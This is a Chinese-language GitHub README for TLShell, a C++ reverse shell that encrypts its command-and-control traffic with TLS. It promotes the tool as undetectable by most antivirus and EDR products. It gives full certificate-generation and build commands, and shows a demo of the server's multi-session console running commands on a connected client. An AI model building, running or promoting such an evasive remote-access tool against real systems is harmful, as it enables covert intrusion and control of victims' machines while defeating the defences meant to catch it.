umutcamliyurt/TLShell
GitHub: umutcamliyurt/TLShell
TLShell 是一个基于 TLS 加密的隐蔽反向 Shell 工具,通过加密 C2 通信来规避传统网络安全设备的明文流量检测。
Stars: 1 | Forks: 1
# TLShell
## 一个加密的隐蔽反向 shell
## 描述:
传统的反向 shell 以明文形式发送数据,这使得它们很容易被网络监控工具、入侵检测系统(IDS)或防火墙检测或拦截。然而,通过 TLS 加密,攻击者与目标机器之间的通信是加密的,从而确保了机密性,并降低了被检查未加密流量的安全工具检测到的风险。
## 功能:
- 大多数 AV/EDR 解决方案无法检测
- 支持多会话
- 使用 C++ 编写
- 加密的 C&C
**重要提示:请将客户端代码中硬编码的证书替换为您自己的证书**
## 安装:
```
sudo apt update
sudo apt install openssl mingw-w64 libssl-dev
git clone https://github.com/umutcamliyurt/TLShell.git
cd TLShell/
openssl req -x509 -newkey rsa:2048 -keyout server.key -out server.crt -days 36500 -nodes
g++ server.cpp -o server -lssl -lcrypto
g++ client.cpp -o client -lssl -lcrypto
```
## 演示:
```
umutcamliyurt@localhost:~/Projects/TLShell$ sudo ./server 443
Server listening on port 443...
Commands:
/list - list clients
/switch - set active session
/broadcast - send to all clients
/kick - disconnect a client
/help - show this help
/exit - shutdown server
Typing anything else sends it to the active session.
>
> [server] Client #1 connected from 127.0.0.1:38194
> id
>
[1 127.0.0.1:38194] uid=1000(umutcamliyurt) gid=1000(umutcamliyurt) groups=1000(umutcamliyurt),3(sys),981(rfkill),998(wheel)
>
```
## 结果:

*图 1:Linux 上的结果。*

*图 2:Windows 上的结果。*
## 许可证
基于 MIT 许可证分发。查看 `LICENSE` 获取更多信息。
标签:C++, Gophish, TLS加密, 反向Shell, 命令与控制(C2), 安全测试工具, 底层编程, 数据擦除, 网络信息收集